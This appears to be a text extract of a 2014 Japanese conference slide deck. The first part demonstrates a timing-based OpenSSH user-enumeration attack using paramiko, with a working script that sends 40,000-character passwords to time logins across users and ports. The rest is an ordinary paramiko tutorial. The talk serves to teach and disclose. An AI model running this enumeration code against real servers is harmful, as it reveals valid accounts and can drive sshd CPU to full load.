1. OpenSSH User Enumeration Time-Based Attack Python-paramiko 2014/06/17 #ssmjp @togakushi

2. 2 OSUETA OpenSSH OpenSSH-4.2~6.6 blog https://cureblog.de/2013/07/openssh-user-enumera PoC https://github.com/c0r3dump3d/osueta 2 3. 3 4. 4 PoC python-paramiko 40000 parse.add_argument('-l', action='store', dest='length', default='40', help='Length of the password in characters (x1000) (default 40).') length = int(argus.length)*1000 sock.connect((host,int(port))) para = paramiko.Transport(sock) para.connect(username=user) passwd = 'A'*length para.auth_password(user,passwd) 5. 5 >>> import socket, paramiko >>> s = socket.create_connection(('192.168.122.225',22)) >>> t = paramiko.Transport(s) >>> t.connect(username='root') >>> t.auth_password('root','A'*40000) Traceback (most recent call last): ( ) AuthenticationException: Authentication failed. 6. 6 >>> import socket, paramiko >>> s = socket.create_connection(('192.168.122.225',22)) >>> t = paramiko.Transport(s) >>> t.connect(username='hage') >>> t.auth_password('hage','A'*40000) Traceback (most recent call last): ( ) AuthenticationException: Authentication failed. 7. 7 40000 sshd CPU 100% 8. 8 001: #!/usr/bin/env python 002: 003: import time 004: import paramiko 005: 006: def login(username='root', password='A'*8, port=22): 007: ssh = paramiko.SSHClient() 008: ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 009: 010: s = time.time() 011: try: 012: ssh.connect(hostname='192.168.122.112', 013: port=port, 014: username=username, 015: password=password, 016: allow_agent=False, 017: ) 018: except paramiko.AuthenticationException: 019: e = time.time() 9. 9 022: 023: userlist = [ 024: 'root', 'hoge', 'fuga' 025: ] 026: ports = [ 027: 22, 028: 22421, 22431, 22432, 22441, 22451, 22461, 22471, 22491, 22501, 029: 22511, 22521, 22531, 22541, 22551, 22561, 22571, 22581, 22582, 030: 22591, 22601, 22611, 22621, 22622, 22631, 22641, 22651, 22661, 031: ] 032: 033: for port in ports: 034: for user in userlist: 035: s,e = login(user, 'A'*40000, port) 036: print 'port:%-5d user:%s time:%f' % (port, user, e - s) 037: print '-' * 40 10. 10 paramiko 11. 11 paramiko Python SSH2 sudo pip install paramiko sudo apt-get install python-paramiko Python SSH 12. 12 SSH .ssh/known_hosts >>> import paramiko >>> ssh = paramiko.SSHClient() >>> ssh.connect('192.168.122.112') Traceback (most recent call last): ( ) SSHException: Server '192.168.122.112' not found in known_hosts >>> ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) >>> ssh.connect('192.168.122.112') >>> 13. 13 SSH known_hosts >>> import paramiko >>> ssh = paramiko.SSHClient() >>> ssh.load_system_host_keys() >>> ssh.connect('192.168.122.112') >>> >>> import paramiko >>> ssh = paramiko.SSHClient() >>> ssh.load_host_keys('.ssh/known_hosts') >>> ssh.connect('192.168.122.112') >>> 14. 14 / / ... >>> ssh.connect('192.168.122.112') >>> keys = ssh.get_host_keys() >>> keys.items() [('192.168.122.112', )] 15. 15 SSH / > ssh-add -l 2048 e0:e6:03:ff:f7:cd:95:07:11:f8:a9:52:e8:79:e3:de .ssh/id_rsa_root (RSA) > python >>> import paramiko >>> ':'.join(['%02x'%i for i in map(ord, paramiko.Agent().get_keys()[0].get_fingerprint())]) 'e0:e6:03:ff:f7:cd:95:07:11:f8:a9:52:e8:79:e3:de' 16. 16 SSH >>> import paramiko >>> ssh = paramiko.SSHClient() >>> ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) >>> ssh.connect('192.168.122.112') >>> i, o, e = ssh.exec_command('ls') >>> o.readlines() ['anaconda-ks.cfgn', 'openssh-servern', 'openssln'] >>> i, o, e = ssh.exec_command('ls2') >>> o.readlines() [] >>> e.readlines() ['bash: ls2: command not foundn'] >>> ssh.close() 17. 17 paramiko SSH / cron etc... 18. 18 connect hostname (str) the server to connect to port (int) the server port to connect to username (str) the username to authenticate as (defaults to the current local username) password (str) a password to use for authentication or for unlocking a private key pkey (.PKey) an optional private key to use for authentication key_filename (str) the filename, or list of filenames, of optional private key(s) to try for authentication timeout (float) an optional timeout (in seconds) for the TCP connect allow_agent (bool) set to False to disable connecting to the SSH agent look_for_keys (bool) set to False to disable searching for discoverable private key files in ~/.ssh/ compress (bool) set to True to turn on compression sock (socket) an open socket or socket-like object (such as a Channel) to use for communication to the target host 19. 19 SFTP connect open_sftp SCP >>> import paramiko >>> ssh = paramiko.SSHClient() >>> ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) >>> ssh.connect('192.168.122.112') >>> sftp = ssh.open_sftp() >>> sftp.get(remorefile, localfile) >>> sftp.close() >>> ssh.close() 20. 20 ( ) sftp.chdir sftp.chmod sftp.chown sftp.close sftp.file sftp.get sftp.getcwd sftp.getfo sftp.listdir sftp.logger sftp.lstat sftp.mkdir sftp.open sftp.put sftp.putfo sftp.readlink sftp.remove sftp.rename sftp.rmdir sftp.sock sftp.stat sftp.symlink sftp.truncate sftp.unlink sftp.utime 21. 21 >>> import paramiko >>> conf = paramiko.SSHConfig() >>> conf.parse(open('.ssh/config')) >>> conf.lookup('kvm01') {'permitlocalcommand': 'yes', 'gatewayports': 'no', 'serveraliveinterval': '300', 'serveralivecountmax': '3', 'hostname': '192.168.1.11', 'hashknownhosts': 'no', 'escapechar': '?', 'controlpath': '~/tmp/.ssh/ControlMaster-togakushi-192.168.1.11.22', 'tcpkeepalive': 'no', 'controlmaster': 'auto', 'controlpersist': '3'} 22. 22 df > cat dhchk.py #!/usr/bin/env python import re, paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect('192.168.122.112', username='root', password='password') i, o, e = ssh.exec_command('df -P') for line in o.readlines(): r = line.split() if re.match('^/$', r[5]): if int(r[4].replace('%', '')) > 50: print '[Warning capacity over] mounted:%s Used:%s(%s)' %(r[5], r[3], r[4]) > ./dhchk.py [Warning capacity over] mounted:/ Used:3541196(52%) 23. 23 paramiko ssh remotehost command 24. 24 close()